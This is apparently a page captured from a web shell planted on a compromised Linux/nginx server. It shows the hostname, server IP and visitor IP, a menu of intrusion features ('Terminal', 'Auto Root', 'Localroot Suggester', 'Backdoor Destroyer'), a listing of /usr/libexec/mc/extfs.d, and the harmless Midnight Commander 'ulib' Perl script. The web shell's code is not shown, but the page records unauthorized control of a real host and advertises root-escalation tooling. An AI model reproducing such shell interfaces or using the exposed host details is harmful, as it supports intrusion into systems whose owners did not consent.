Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.21.163.198
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
libexec /
mc /
extfs.d /
Delete
Unzip
Name
Size
Permission
Date
Action
README
7.22
KB
-rw-r--r--
2016-11-05 23:18
README.extfs
1.11
KB
-rw-r--r--
2016-11-05 23:18
a+
3.13
KB
-rwxr-xr-x
2016-11-05 23:18
apt+
9.5
KB
-rwxr-xr-x
2016-11-05 23:18
audio
1.29
KB
-rwxr-xr-x
2016-11-05 23:18
bpp
1.18
KB
-rwxr-xr-x
2016-11-05 23:18
changesetfs
2.5
KB
-rwxr-xr-x
2016-11-05 23:18
deb
5.34
KB
-rwxr-xr-x
2016-11-05 23:18
deba
3
KB
-rwxr-xr-x
2016-11-05 23:18
debd
10.26
KB
-rwxr-xr-x
2016-11-05 23:18
dpkg+
8.79
KB
-rwxr-xr-x
2016-11-05 23:18
gitfs+
776
B
-rwxr-xr-x
2016-11-05 23:18
hp48+
2.57
KB
-rwxr-xr-x
2016-11-05 23:18
iso9660
2.7
KB
-rwxr-xr-x
2016-11-05 23:18
lslR
1.25
KB
-rwxr-xr-x
2016-11-05 23:18
mailfs
5.35
KB
-rwxr-xr-x
2016-11-05 23:18
patchfs
10.63
KB
-rwxr-xr-x
2016-11-05 23:18
patchsetfs
2.26
KB
-rwxr-xr-x
2016-11-05 23:18
rpm
9.79
KB
-rwxr-xr-x
2016-11-05 23:18
rpms+
1.47
KB
-rwxr-xr-x
2016-11-05 23:18
s3+
9.94
KB
-rwxr-xr-x
2016-11-05 23:18
trpm
7.65
KB
-rwxr-xr-x
2016-11-05 23:18
u7z
2.98
KB
-rwxr-xr-x
2016-11-05 23:18
uace
1.23
KB
-rwxr-xr-x
2016-11-05 23:18
ualz
1.25
KB
-rwxr-xr-x
2016-11-05 23:18
uar
1.29
KB
-rwxr-xr-x
2016-11-05 23:18
uarc
1.59
KB
-rwxr-xr-x
2016-11-05 23:18
uarj
1.62
KB
-rwxr-xr-x
2016-11-05 23:18
uc1541
19.24
KB
-rwxr-xr-x
2016-11-05 23:18
ucab
734
B
-rwxr-xr-x
2016-11-05 23:18
uha
969
B
-rwxr-xr-x
2016-11-05 23:18
ulha
3.78
KB
-rwxr-xr-x
2016-11-05 23:18
ulib
2.74
KB
-rwxr-xr-x
2016-11-05 23:18
urar
2.41
KB
-rwxr-xr-x
2016-11-05 23:18
uzip
14.37
KB
-rwxr-xr-x
2016-11-05 23:18
uzoo
1.39
KB
-rwxr-xr-x
2016-11-05 23:18
Save
Rename
#! /usr/bin/perl -w # # VFS to manage the gputils archives. # Written by Molnár Károly (proton7@freemail.hu) 2012 # my %month = ('jan' => '01', 'feb' => '02', 'mar' => '03', 'apr' => '04', 'may' => '05', 'jun' => '06', 'jul' => '07', 'aug' => '08', 'sep' => '09', 'oct' => '10', 'nov' => '11', 'dec' => '12'); my @PATHS = ('/usr/bin/gplib', '/usr/local/bin/gplib'); my $gplib = ''; foreach my $i (@PATHS) { if (-x $i) { $gplib = $i; last; } } if ($gplib eq '') { print STDERR "\a\t$0 : Gplib not found!\n"; exit(1); } my $cmd = shift; my $archive = shift; #------------------------------------------------------------------------------- sub mc_ulib_fs_list { open(PIPE, "$gplib -tq $archive |") || die("Error in $gplib -tq"); my($dev, $inode, $mode, $nlink, $uid, $gid) = stat($archive); while (<PIPE>) { chomp; my @w = split(/\s+/o); my $fname = $w[0]; $fname =~ s|\\|/|g; printf("-rw-r--r-- 1 %s %s %d %s-%02u-%s %s %s\n", $uid, $gid, int($w[1]), $month{lc($w[4])}, $w[5], $w[7], substr($w[6], 0, 5), $fname); } close (PIPE); } #------------------------------------------------------------------------------- sub mc_ulib_fs_copyin { system("$gplib -r $archive $_[0]"); my $ret = $?; if ($ret) { die("Error in: $gplib -r"); } } #------------------------------------------------------------------------------- sub mc_ulib_fs_copyout { my($module, $fname) = @_; my $tmpdir = $ENV{'TMPDIR'}; $tmpdir = '/tmp' if ($tmpdir eq ''); open(PIPE, "$gplib -tq $archive |") || die("Error in: $gplib -tq"); while (<PIPE>) { chomp; my @w = split(/\s+/o); my $module_orig = $w[0]; my $count = () = ($module_orig =~ /(\\)/g); my $md = $module_orig; $md =~ s|\\|/|g; if ($module eq $md) { return if ($count); } } close (PIPE); chdir($tmpdir); system("$gplib -x $archive $module"); my $ret = $?; if ($ret) { die("Error in: $gplib -x"); } rename($module, $fname) || die("Error in: rename($module, $fname)"); } #------------------------------------------------------------------------------- sub mc_ulib_fs_rm { system("$gplib -d $archive $_[0]"); my $ret = $?; if ($ret) { die("Error in: $gplib -d"); } } ################################################################################ if ($cmd eq 'list') { mc_ulib_fs_list(@ARGV); } elsif ($cmd eq 'copyin') { mc_ulib_fs_copyin(@ARGV); } elsif ($cmd eq 'copyout') { mc_ulib_fs_copyout(@ARGV); } elsif ($cmd eq 'rm') { mc_ulib_fs_rm(@ARGV); } else { exit(1); }